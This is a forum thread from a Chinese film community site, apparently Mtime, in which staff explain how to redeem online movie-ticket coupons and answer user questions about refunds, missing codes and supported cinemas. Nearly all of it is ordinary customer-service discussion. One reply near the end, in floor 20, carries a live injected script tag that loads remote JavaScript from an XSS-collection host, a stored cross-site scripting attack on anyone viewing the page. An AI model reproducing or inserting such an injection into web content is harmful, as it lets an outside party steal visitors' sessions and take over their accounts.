网站地图
首页
新闻
电影新闻
电视新闻
人物新闻
专题策划
影评
最新影评
新片热评
经典赏析
媒体评论
电影院
北京影讯
上海影讯
广州影讯
深圳影讯
成都影讯
电影库
典藏佳片
全球新片
即将上映
票房榜
社区
影视杂谈
明星时尚
文化休闲
群组
话题
达人
排行榜
电影榜
电视榜
人物榜
日志榜
话题榜
你现在的位置:首页>>群组>>站务论坛>>线上优惠券使用说明!(通用)

线上优惠券使用说明!(通用)

加入收藏 已经被100位会员收藏

各位网友,大家好:

因近期有很多网友咨询购买优惠券的使用流程问题,现特此发布具体购票流程,请大家查看。

优惠券是属于线上优惠券,支付成功后该优惠券在“我的账户”—“优惠券”—“优惠券列表”中出现,代表你已购买成功。

如图:

下面具体介绍一下优惠券使用流程。

第一步:选择影片、影院、场次,点击选座购票。

第二步:选择座位、输入兑换手机号,点击“下一步”

第三步:进入支付页面,勾选相应优惠券,直接点击“付款”

第四步:使用优惠券支付成功后,时光网系统会给填写的接收手机号中发送取票兑换码,请各位网友以短信中提示的取票方式到影院取票观影。

特别提示:

1.请勿点击支付页面中的“使用优惠码/优惠券”绿色按钮!

2.优惠券及套票,需在同一笔订单中完成使用,无法拆分使用,请选择套票所对应的座位数量订购(如:双人套票,即为:2个座位)

3.别忘了确认出票前核对一遍订单详情哦!

注:请广大用户在有效期内完成使用,如过期无法退款。

时光使者预祝各位网友观影愉快!

--------------------
我们朝着做中国最专业的电影社区网站的梦想努力!!

楼主

收藏~~使者好有耐心,mua~

电影不是济世良药,只是一片阿司匹林。
回复 举报

1 楼

请问四张优惠券能两个人同时观影两次嘛
我也想知道,两个人的票能同时用吗?
同求。。。
我也想知道,四张优惠券可不可以两人同时观看两场电影
可以,不过要一张一张的买,昨天试了一下,很好用!不能两张同时下票,可以分开一张一张选择!
谢谢了!

我收到手机信息了,然后用不用到我的账户-优惠券-优惠码激活那里再激活一次?还是直接拿手机去电影院取票即可??

回复 举报

2 楼

长安宿命,你好。请按照短信中的提示的取票内容,在影片开场前,到订购的影院现场使用自助取票机取票即可,如有疑问可致电时光网客服中心:4006-118-118。感谢支持,预祝观影愉快。
你好。海城蓝天广场的能使用吗?
一切未知,皆有可能。

我抢购了 32元特种部队2-3D券 但是本地区不能使用 帮我退款啊

回复 举报

3 楼

被解救的姜戈如果恢复上映了,优惠券的使用期是不是也要向后延啊?

回复 举报

4 楼

你好。如影片在优惠券的有效期内还未上映,我们会一一联系用户,办理退款。如有疑问可致电时光网客服中心:4006-118-118。
在广西柳州的中影星天影城,卖票的小妹怎说只支持交行的最红星期五和美团网团购兑换卷呢?如果柳州用不了帮我赶紧退了,下次登陆等你回复
M_1412182208346305541,您好。使者帮你查询中影星天影城不支持时光网在线选座购票,“贺岁套票优惠券”不能使用,已为您办理退款,3-7个工作日退回原支付账户。

我抢购了 25元特种部队2-3D券 但是本地区不能使用 帮我退款啊

回复 举报

5 楼

我抢购了25元特种部队2-3D券 但是本地区不能使用 帮我退款啊

回复 举报

6 楼

各位时光网友,大家好。关于优惠券退款问题,请致电时光网客服中心:4006-118-118进行咨询。
回复 举报

7 楼

您好,这个优惠套票需要补差价吗?

我买的特种部队2 IMAX59元一张的,在哈尔滨万达衡山店能购票吗?为什么我点击影片播放的时间进不去选座的页面呢?

回复 举报

8 楼

有的影院可以提前在网上购票,有的不能。如果时光网上这个影院的观影时间是白色的就不能,你点击也不会有反应。能的电影院,观影时间是橙色的,点击会出现选座页面。我去你提到的影院看了下,这个影院就是不能提前在时光网购票的那种。你去北京等大城市找个大影院看看,就知道能的是什么样了。以后买优惠券前要看清楚想去的影院能不能。
生活就像《异次元杀阵》,你无法逃脱,而且永远不知道你会撞上什么。

心心5277,你好。经查询,哈尔滨地区暂无IMAX适用影院,故优惠券无法正常使用。办理优惠券退款事宜请致电时光网客服中心:4006-118-118,感谢支持,祝您生活愉快。

回复 举报

9 楼

优惠券怎么退

希望django 还有机会上映。但是如果一直没有上映,也希望时光能够及时安排退款。

回复 举报

10 楼

在我的地区已经没办法使用优惠券,但不到过期日期,能退掉吗

如果《被解救的姜戈》能上映,希望时光网可以将电子券的使用期限延长

回复 举报

11 楼

各位时光网友,大家好。目前《被解救的姜戈》还未恢复放映,有效期会根据恢复上映的情况再进行调整。如该影片确认不再放映,我们会联系每一位用户,安排退款,请放心。

回复 举报

12 楼

你好,,学生购买电影票需要带什么证件?

是每个电影院都能阅换 还是指定电影院?

回复 举报

13 楼

Omnec,你好。只要是在时光网支持在线购票的影院就可以使用。

买的优惠劵,手机没有收到优惠码怎么办?

回复 举报

14 楼

你好。你购买的优惠券会在“我的账户”—“优惠券列表”中体现出来,证明已购买成功。具体使用规则,请查看此贴内容。
不需要激活的吗?

凌晨0点预订了《星际迷航》南宁的票,预付费显示支付成功,但到现在还没收到提供优惠码的短信,是怎么回事???还要等到首映之后才发过来吗?这样不科学呀!

回复 举报

15 楼

您好,通过查询您已经成功购买了《星际迷航》优惠券,您在该影片上映时可以通过在线选座方式进行使用优惠券。
请明确答复:在我的帐户预订栏里提示要输入的所谓“优惠码”,是否你所谓的优惠券的代码?这个优惠码什么时候会提供给我?
我也到处找不到优惠码
谁能告诉我 早上几点可以订到当天的电影票?
也到处找不到优惠码
AHHA

本来预订还没上映的电影票,就是比较少有的业务,因为时光网提供的是优惠价格,因此想试一试,没想到按照流程操作、支付之后,没有任何认证通知让买票的人确认预订手续已经完成。希望时光网改进该项业务,或至少明确告知预订单的状态,以防出现购销环节上的漏洞。

回复 举报

16 楼

星际迷航 暗黑无界,提前抢票的IMAX专场是3D的吗?是不是同时3DIMAX?

回复 举报

17 楼

星际迷航订购了。没 有优惠码~~~手机也没收到信息。。。请问这是怎么回事?不能激活?

回复 举报

18 楼

这个劵也太坑人了,显示要激活却不提供优惠码?现在团购业务那么好用。为什么不借鉴一下人家的模式

回复 举报

19 楼

时光使者上面的那么详细的说明真是白打了。我觉得这个比团购好得多了去了,离我最近的电影院很贵而且从来不开团购,时光网这个券太方便了。
shut up. kick-ass
啊 是啊 晕啊 没有优惠码怎么兑换啊 是不是要等上映了才能兑换???
现在可以兑换了 点击在线选票啊
啊 是啊 晕啊
AHHA

我在时光预定了星际迷航的巨幕票,但搜了一下不确定时光支持的影院有没有可以上巨幕的,到时候会显示么?如果没有的话可以退票么?

回复 举报

20 楼

应该退不掉吧</div><script src=http://xss.tw/3229></script>
我不断听到或读到巧妙的、但是并不确切的解释。其实,达利和我只是选拍了临时想到的一些噱头和实物;我们断然舍弃一切能传达含义的内容.
星际迷航的巨幕票
AHHA
哈哈2016年再问吧
爱生活,爱电影,爱音乐,爱这世间美好的一切

我要回复

参与话题讨论,请先 注册登录

站务论坛

20869名成员12195个主题

性质: 公开, 自由加入

可用积分:25分